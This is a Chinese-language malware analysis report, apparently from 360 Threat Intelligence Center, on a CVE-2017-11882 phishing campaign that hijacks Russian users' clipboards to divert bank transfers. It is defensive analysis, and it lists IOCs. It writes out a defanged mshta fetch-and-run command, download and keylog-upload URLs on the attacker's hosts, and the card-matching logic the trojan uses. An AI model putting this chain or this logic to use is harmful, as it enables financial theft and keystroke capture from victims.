一波盜取俄羅斯使用者銀行卡資金的定向攻擊樣本分析
背景
自從2018年10月25日起,360威脅情報中心連續捕獲了多個專門盜竊俄羅斯語使用者銀行卡資金的定向攻擊樣本。這批定向攻擊樣本主要利用微軟Office CVE-2017-11882漏洞配合釣魚文件進行定向投遞:漏洞文件最終釋放的木馬程式會不斷監控使用者的系統剪下板,如果發現具有銀行賬號或者yandex賬號的特徵,就會把剪下板裡的銀行賬號替換為攻擊者的MasterCard(萬事達)銀行卡賬號。一旦使用者通過拷貝的方式輸入目標銀行賬號,則會把錢轉向攻擊者賬戶。並且木馬程式還會下載一個俄羅斯著名的yandex.ru入口網站提供的鍵盤管理工具Punto Switcher 3.1,以用於竊取使用者的鍵盤記錄,藉以躲避防毒軟體的查殺。
樣本分析
執行流程
捕獲到的樣本的整個攻擊流程如下:
Dropper
360威脅情報中心最初發現的樣本是名為логотип.doc的RTF漏洞利用文件,該漏洞利用樣本包含一個CVE-2017-11882漏洞的公式物件。漏洞觸發後會通過執行mshta hxxp://xnz.freetzi.com/z.hta 命令來實現載入執行hxxp://xnz.freetzi.com/z.hta上的指令碼:
Downloader
z.hta
下載執行的hta檔案主要功能如下:
z.hta首先會使用tasklist命令結束winword.ext程序,緊接著判斷:
%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chromeupd.exe檔案是否存在,如果不存在則利用Google Chrome瀏覽器去下載hxxp://xnz.freetzi.com/1.rar檔案:
下載回來的1.rar其實是一個VBS指令碼檔案,1.rar會被移動到路徑:%userprofile%\appdata\roaming\1.vbs,然後使用wscript.exe執行該VBS指令碼:
1.vbs
1.vbs指令碼執行後會首先下載hxxp://xnz.freetzi.com/1.zip到%APPDATA%/1.zip,接著下載hxxp://xnz.freetzi.com/p.zip 到%APPDATA%/p.zip,並解壓到%APPDATA%目錄下:
最後把1.zip壓縮包裡面的1.png移動到啟動目錄下:
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Chromeupd.exe來實現惡意樣本持久化,最後刪除1.zip和p.zip和1.vbs檔案。
Backdoor(Chromeupd.exe)
被寫入自啟動項的Chromeupd.exe是該定向攻擊木馬的核心功能模組。樣本是C#編寫的程式,樣本執行後會首先註冊5個定時器實現其5個主要功能:
- 監控系統剪下板裡可能出現的銀行卡賬號並替換成攻擊者的MasterCard銀行卡賬號
- 隱藏程式視窗
- 安裝下載回來的p.png(Punto Switcher 3.1版本,俄羅斯的一個正常的鍵盤管理工具)
- 上傳鍵盤管理工具中的diary.dat到hxxp://apz.freetzi.com/upload.php
- 檢查是否需要自刪除和是否需要獲取新的攻擊者的銀行卡賬號
替換剪下板裡可能出現的銀行卡賬號
其中一個定時器功能會判斷當前系統剪下板裡面的內容是否是字串,如果是則判斷是哪種型別的賬號,然後將其中的賬號替換為內建的攻擊者賬號:
其中的判斷規則為:當剪下板中的字串長度為16,則把這個16位的字串做Luhn演算法(見參考[2])校驗。如果校驗通過,則把剪下板中的字串替換為內建的MasterCard卡號:
而如果剪下板中的字串長度在10到17之間,且字串起始數字是410開頭,並且字串全為數字字串,則試用內建的yandex賬號替換:
而對於字串中有‘-’或‘ ’分割的情況,同樣也會做Luhn演算法校驗,校驗通過則替換為內建同樣格式的MasterCard卡號:
隱藏視窗
而當2號定時器執行時,則呼叫hide()函式實現當前視窗隱藏,之後讓該定時器失效:
安裝下載的p.png(Punto Switcher 3.1版本,俄羅斯的一個正常的鍵盤管理工具)
3號定時器首先會建立登錄檔項:Software\\Yandex\\Punto Switcher\\3.1,並設定Option鍵值,以用於配置即將要安裝的Punto Switcher軟體:
接著把%APPDATA%/p.png(第二步1.vbs下載回來的檔案)重新命名為p.exe後執行。執行30秒後,刪除p.exe:
而p.exe是一個自解壓檔案,裡面的包含的檔案是Punto Switcher 3.1的應用程式安裝檔案。該自解壓檔案執行後,靜默安裝Punto Switcher 3.1到%APPDATA%/p/目錄下,然後啟動%APPDATA%\p\punto.exe:
上傳鍵盤管理工具中的diary.dat檔案
定時器4會獲取定時器3安裝的Punto Switcher 3.1軟體目錄下的diary.dat檔案,並且上傳到hxxp://apz.freetzi.com/upload.php :
檢查是否需要自刪除和是否需要獲取新的攻擊者的銀行卡賬號
定時器5會向hxxp://apz.freetzi.com/terminate傳送請求,當返回yes的時候,就遍歷程序把程序名為punto和ps64ldr的程序結束,然後再把%APPDATA%/p/目錄(Punto Switcher 3.1的安裝目錄)刪除。最後結束自身程序:
如果返回的不是yes,則請求hxxp://apz.freetzi.com/override_trigger,並檢查是否需要替換攻擊者的銀行卡賬號。如果返回yes,則請求hxxp://apz.freetzi.com/override,獲得最新攻擊者的銀行卡賬號:
攻擊者當前內建的銀行卡賬號為5106211036145444,內建的yandex賬號為410017721321307
攻擊者資訊溯源
360威脅情報中心通過一些公開渠道校驗攻擊者的銀行卡號後得知,攻擊者內建的銀行賬號為MasterCard(萬事達卡)Credit Card,萬事達卡(MasterCard)成立於1966年,和VISA並列為全球最大的兩大刷卡消費聯盟。
通過公開渠道查詢攻擊者的銀行卡賬號:5106211036145444,可以得知該卡為萬事達信用卡:
總結
360威脅情報中心本次監測到的定向攻擊並沒有發現在國內的受影響者,不過盜號木馬類樣本一直以來非常活躍,而此次捕獲到的盜號木馬樣本並不會直接盜取使用者的卡號/密碼,而是通過替換使用者剪貼簿中的銀行卡賬號的方式讓使用者在不知覺中將資金轉移到黑客的賬戶名下。並且還使用了正常軟體來獲取使用者的隱私資料資料,讓普通使用者很難有所察覺。所以廣大使用者在銀行卡轉賬前、轉賬過程中,都要多次確認其賬號是否正確。對於電腦裡無故增加的軟體,也需要十分注意。
目前,基於360威脅情報中心的威脅情報資料的全線產品,包括360威脅情報平臺(TIP)、天眼高階威脅檢測系統、360 NGSOC等,都已經支援對此類攻的精確檢測。
IOC/">IOC
| C&C |
| xnz.freetzi.com |
| apz.freetzi.com |
| 檔案MD5 | 描述 |
| 9aca967928da3de8c2ec619026f5fb50 | 誘餌檔名:логотип.doc |
| bee1d162463eb8b72b0859a43c578d8e | 誘餌檔名:Manual.doc |
| b324446b9ad4ebc36c4e3d2ab5e964f6 | 誘餌檔名:Лабораторная работа 5.doc |
| c00dbb7071dd1d75a374b5890c919d77 | Downloader:1.rar(1.vbs) |
| 7740b98568ed72651b300c683dfb61e2 | Backdoor:1.png(Chromeupd.exe) |
| e4a01e57cb448bb4f6b1fc45c0ae083f | Punto鍵盤管理工具自解壓包:p.png |
| 攻擊者賬號 | 描述 |
| 5106211036145444 | 攻擊者MasterCard賬號 |
| 410017721321307 | 攻擊者yandex賬號 |
參考
[1].https://yandex.ru/soft/punto/
[2].https://en.wikipedia.org/wiki/Luhn_algorithm